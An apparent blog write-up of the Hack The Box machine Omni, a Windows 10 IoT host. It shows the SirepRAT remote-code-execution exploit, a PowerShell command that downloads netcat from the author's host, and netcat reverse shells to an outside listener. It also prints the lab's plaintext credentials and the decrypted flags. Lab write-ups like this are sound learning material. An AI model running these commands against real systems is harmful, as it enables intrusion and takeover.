Hack The Box Writeup: Omni (10.10.10.204)

The box Omni had a very unusual Operating System for HTB machines. It was a Windows 10 IoT machine, which was new for me. The foothold consisted of an exploit for this Operating System. For user and root, I used the same technique and grabbed reverse shells.

Hack The Box Omni

[0x1] Reconnaissance & Enumeration

The start of this journey includes the well known Nmap scan. There are a few ports open, including an RPC, Win-RM, web, and some higher ports. Port 8080 is detected as an IIS webserver port and hosts a website called “Windows Device Portal”. A quick search explains that this is the Windows 10 IoT Operating System.

nmap -sC -sV -p- -oA omni 10.10.10.204

Nmap scan report for 10.10.10.204
Host is up (0.039s latency).
Not shown: 65529 filtered ports
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=11/2%Time=5FA05F74%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Visiting the website on port 8080 only gives a Basic login prompt which you have to use to authenticate before you can access the Device Portal.

[0x2] Initial Foothold

While searching for Windows IoT vulnerabilities, I stumbled upon a GitHub page called “SirepRAT – RCE as SYSTEM on Microsoft IoT Core”. This described a vulnerability in Windows IoT Core’s Sirep Service. This service is installed with the Operating System by default and included to help test drivers and hardware.

The exploit described a way you could execute commands as SYSTEM remotely. The first thing that came to my mind is to use it to launch a reverse shell and get access to the machine. Let’s fire up a Python webserver to serve Netcat for Windows on port 8000.

python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...

To get that Netcat for Windows to the other side, I used the SirepRAT exploit and placed it in a directory I know I can write to on a Windows machine. This worked like a charm and Netcat is now ready for launch.

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "powershell" --args " /c Invoke-WebRequest -Uri "http://10.10.14.64:8000/nc64.exe" -OutFile "c:\\windows\\system32\\spool\\drivers\\color\\nc64.exe"" --v

Before I can run Netcat, I have to make sure Netcat on the receiving part is ready for an incoming connection.

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...

With the executable in place, and my Netcat listener running, it is time to run Netcat remotely and call home to my machine on port 1337 with a command prompt.

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "cmd.exe" --args " /c c:\\windows\\system32\\spool\\drivers\\color\\nc64.exe 10.10.14.64 1337 -e cmd" --v

Just as I expected, that worked like a charm. It is always a surprise if the tools you use on a Microsoft Windows machine are not blocked by things like Defender because that is still included in Windows 10 IoT. Nevertheless, we’ve got a shell. I had to search how you can find out as to which user you are logged on since whoami did not work on this box. Courtesy of Windows 10 IoT.

connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49682
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

PS C:\> $env:username
$env:username
DefaultAccount

[0x3] Path to User flag

The box seemed pretty standard, with no interesting software or services. One thing I also do on Windows boxes is run a search for specific filetypes. Textfiles, batch files, and Powershell scripts. Many Windows boxes hide their gems like that. Also, a quick check to see if there are any other usernames that look interesting, and one for the flag (which was not there).

PS C:\data\users> dir -force
dir -force
    Directory: C:\data\users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/4/2020 9:48 PM administrator
d----- 7/4/2020 9:53 PM app
d-rh-- 7/4/2020 12:22 AM Default
d----- 7/3/2020 11:22 PM DefaultAccount
d----- 7/3/2020 11:22 PM DevToolsUser
d-r--- 8/21/2020 1:55 PM Public
d----- 7/4/2020 10:29 PM System    

So for the search, I use a quick and dirty Powershell command. It does the trick.

PS C:\> Get-ChildItem c:\*.txt -force -Recurse
PS C:\> Get-ChildItem c:\*.xml -force -Recurse
PS C:\> Get-ChildItem c:\*.bat -force -Recurse

There were a few files that were returned by the search. Batch-file to be precise. Since r.bat does not sound like a default Windows file it decided to take a further look.

    Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 8/21/2020 12:56 PM 247 r.bat

    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2018 11:36 PM 925 Pester.bat

    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2018 11:36 PM 744 Build.bat  

The script showed two sets of credentials, one for the user ‘app’ and one for the user ‘administrator’. That sounds promising.

type r.bat

@echo off
:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls
GOTO :LOOP
:EXIT

With the user credentials for ‘app’ I decided to try and logon to the Windows Device Portal to see if that can help me get to the next step on this box.

After authenticating as ‘app’ I find a nice option to run commands. Which the Netcat for Windows executable is still present, I try to run that in the context of the logged-on user ‘app’. Before the launch a start a new listener on my machine to catch the incoming connection.

rlwrap netcat -lvnp 1338
listening on [any] 1338 ...

The reverse shell worked and now I have a new connection as the user app.

listening on [any] 1338 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49684
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32>
PS C:\windows\system32> $env:username
$env:username
app

With the new shell active, I go on to look for the user flag. There are two files in the home directory of this user which are interesting. The user.txt and hardening.txt.

PS C:\data\users\app> dir
dir
    Directory: C:\data\users\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/4/2020 7:28 PM 3D Objects
d-r--- 7/4/2020 7:28 PM Documents
d-r--- 7/4/2020 7:28 PM Downloads
d----- 7/4/2020 7:28 PM Favorites
d-r--- 7/4/2020 7:28 PM Music
d-r--- 7/4/2020 7:28 PM Pictures
d-r--- 7/4/2020 7:28 PM Videos
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
-ar--- 7/4/2020 9:53 PM 1958 user.txt   

The content of the hardening file is not that interesting, but it does hint at the fact that the administrator password I found could be the actual one.

type hardening.txt

- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator
account from "Ssh Users" group

The content of the user.txt is a whole different story. Normally you would find the code to submit to the Hack The Box website, but this time the flag seems to be encrypted. Based on the structure it is encrypted with Powershell.

type user.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

If you are familiar with the way Powershell can encrypt strings it is easy to decode the flag. The User flag is now in possession.

$credential = Import-CliXml -Path user.txt
$credential.GetNetworkCredential().Password

7cfd50f6bc34db3204898f1505ad9d70

[0x4] Path to Root flag

Since we already have credentials for root, I try if the same technique can be used to get a root shell. So again I start a listener, log in to the website with the Administrator credentials from the batch file, and execute Netcat to connect to my listener. And it looks like a charm. Now I have myself a nice reverse shell as ‘Administrator’.

listening on [any] 1339 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49685
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32> $env:username
$env:username
Administrator

It looks like the root flag is also present here and we can simply grab it and call it a day.

PS C:\data\users\administrator> dir

    Directory: C:\data\users\administrator

Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/3/2020 11:23 PM 3D Objects
d-r--- 7/3/2020 11:23 PM Documents
d-r--- 7/3/2020 11:23 PM Downloads
d----- 7/3/2020 11:23 PM Favorites
d-r--- 7/3/2020 11:23 PM Music
d-r--- 7/3/2020 11:23 PM Pictures
d-r--- 7/3/2020 11:23 PM Videos
-ar--- 7/4/2020 9:48 PM 1958 root.txt

How about that, it is also encrypted using the same method as the user flag.

PS C:\data\users\administrator> type root.txt

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>
    </Props>
  </Obj>
</Objs>

We can decrypt the root flag and get the root flag to submit for this box. I can officially call Omni rooted.

$credential = Import-CliXml -Path root.txt
$credential.GetNetworkCredential().Password

5dbdce5569e2c4708617c0ce6e9bf11d




[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.